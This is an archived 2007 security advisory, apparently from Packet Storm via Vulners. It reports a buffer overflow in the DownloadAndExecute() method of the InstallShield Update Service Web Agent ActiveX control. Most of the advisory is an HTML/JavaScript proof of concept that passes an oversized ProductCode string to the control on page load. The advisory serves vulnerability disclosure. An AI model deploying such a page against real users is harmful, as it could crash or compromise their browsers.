Lucene search
K

installshield-overflow.txt

🗓️ 24 Dec 2007 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

The InstallShield Update Service Web Agent 5.1.100.47363 suffers from a buffer overflow in ProductCode parameter of DownloadAndExecute() functio

Code
`The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an  
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()  
function. This object is marked safe for scripting. Note that this issue appears to different  
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that  
issue fixes this issue as well since the update renders this object unsafe for scripting.  
PoC as follows:  
  
-----------------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 12000) s = s + 'A';  
  
obj.Initialize("", "", "", "");  
obj.DownloadAndExecute("", s, 0, "", "");  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"  
/>  
</object>  
</body>  
</html>   
-----------------------  
  
  
Elazar  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation